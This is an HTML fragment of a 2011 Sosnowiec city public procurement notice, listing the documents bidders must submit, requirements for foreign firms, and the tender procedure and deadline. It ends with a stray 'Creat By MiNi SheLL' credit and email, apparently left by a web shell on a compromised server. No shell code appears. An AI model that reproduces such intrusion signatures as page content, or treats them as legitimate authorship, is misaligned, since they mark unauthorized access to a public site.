<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Zamawiający na podstawie treści zawartej w oświadczeniu wykonawcy o braku podstaw do wykluczenia oraz na podstawie załączonych do tego oświadczenia dokumentów wymienionych w punkcie III.4.2).OGŁOSZENIA O ZAMÓWIENIU dokona oceny, czy wykonawca podlega lub czy nie podlega wykluczeniu z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, stosownie do sytuacji faktycznej wykonawcy oraz stosownie do formy prawnej prowadzonej działalności;<br>
2.Zamawiający na podstawie treści zawartej w oświadczeniu wykonawcy o spełnieniu warunków udziału w niniejszym postępowaniu oraz na podstawie załączonych do tego oświadczenia dokumentów wymienionych w punktach od III.3. 2) do III.3. 5) i III.4.1) OGŁOSZENIA O ZAMÓWIENIU dokona oceny, czy wykonawca spełnia lub czy wykonawca nie spełnia warunków udziału w postępowaniu o udzielenie niniejszego zamówienia.<br>
3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający wymaga aby każdy z wykonawców złożył indywidualnie oświadczenie i dokumenty wymienione w punktach III.4.1) oraz III.4.2) OGŁOSZENIA O ZAMÓWIENIU.<br>
4.W przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, jeżeli osoby, o których mowa w art. 24 ust. 1 punkt 5-8 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do tych osób zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 punkt 5-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.<br>
5.Oświadczenia wymienione w punktach III.4.1) oraz III.4.2) OGŁOSZENIA O ZAMÓWIENIU wykonawca składa w oryginale, dokumenty wymienione w punktach III.4.1) oraz III.4.2) OGŁOSZENIA O ZAMÓWIENIU wykonawca składa w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.<br>
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w punkcie III.4.2) tiret 7 OGŁOSZENIA O ZAMÓWIENIU, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów poświadczają za zgodność z oryginałem wykonawca lub te podmioty.<br>
7.Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.<br>
8.Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.<br>
9.Pełnomocnictwo wykonawca składa w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.<br>
10.Ofertę pod rygorem nieważności wykonawca składa w formie pisemnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, al. Zwycięstwa 20, 41-200 Sosnowiec, pokój 203 B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2011 godzina 12:00, miejsce: Urząd Miejski, al. Zwycięstwa 20, 41-200 Sosnowiec, pokój 203 B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rozwoju Regionalnego w ramach Regionalnego  Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Działanie 2.2. Rozwój elektronicznych usług publicznych Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 (nr naboru 02.02.00-084/09, nr projektu 1081).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com